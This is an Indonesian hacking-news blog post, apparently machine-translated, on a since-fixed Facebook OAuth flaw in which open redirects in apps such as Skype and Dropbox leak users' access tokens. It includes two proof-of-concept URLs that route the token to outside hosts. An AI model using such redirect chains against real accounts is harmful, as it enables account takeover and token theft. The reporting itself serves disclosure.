URL Redirection cacat aplikasi di facebook mendorong kerentanan OAuth kembali beraksi | Ini Blog ku - Hacking News
Ini Blog Ku - Hacking News

Apr 4, 2013

URL Redirection cacat aplikasi di facebook mendorong kerentanan OAuth kembali beraksi

Dalam posting sebelumnya, kami hacker Facebook 'Nir Goldshlager' terkena dua serius Facebook oAuth Cacat. Satu, Hacking akun Facebook bahkan tanpa pengguna menginstal aplikasi pada account mereka dan kedua, berbagai cara untuk melewati perlindungan regex di Facebook OAuth.
Kali ini, Nir digambarkan serangan skenario "apa yang terjadi ketika aplikasi yang diinstal pada rekening korban dan bagaimana seorang penyerang dapat memanipulasi begitu mudah" Menurut hacker, jika korban memiliki aplikasi diinstal seperti Skype atau Dropbox, masih hacker mampu untuk mengambil kendali atas account mereka.

Untuk ini, seorang penyerang yang dibutuhkan hanya pengalihan url atau scripting lintas situs kerentanan pada aplikasi Facebook pemilik yaitu domain dalam skenario ini kita berbicara tentang aplikasi skype facebook. Dalam banyak program bug bounty URL redirection tidak dianggap sebagai kerentanan berlaku untuk hadiah yaitu Google Program karunia Bug.

Nir juga menunjukkan bahwa seorang penyerang bahkan dapat memperoleh pengetahuan tentang aplikasi mana korban mereka gunakan. Contoh url : https://www.facebook.com/ajax/browser/dialog/friends_using_app/?app_id=260273468396&__asyncDialog=2&__a=1&__req=m



Metode hack Melanjutkan digunakan dalam terakhir dua kelemahan oAuth (disebutkan di sini), kali ini serangan sedang mencoba untuk menggunakan aplikasi cacat redirection di "di samping redirect_uri" parameter untuk mencuri access_token pengguna facebook.

POC (Menggunakan aplikasi Skype): https://www.facebook.com/dialog/permissions.request?app_id=260273468396&display=page&next=http://metrics.skype.com/b/ss/skypeglobalmobile/5.4/REDIR/?url=http://files.nirgoldshlager.com&response_type=token&fbconnect=1
 
POC (Menggunakan aplikasi Dropbox): https://www.facebook.com/dialog/permissions.request?app_id=210019893730&display=page&next=https://www.dropbox.com/u/68182951/redirect3.html&response_type=token&perms=email&fbconnect=1

Tujuan hacker adalah hanya untuk mencuri access_token korban melalui penggunaan Facebook OAuth kelemahan, sehingga ia dapat mengambil kontrol penuh atas akun korban dari jarak jauh tanpa mengetahui password mereka.

Catatan: Cacat pada facebook telah dilaporkan oleh Nir Goldshlager
pada tim keamanan Facebook dan Fixed atau diperbaiki.


Artikel Terkait

0komentar:

Post a Comment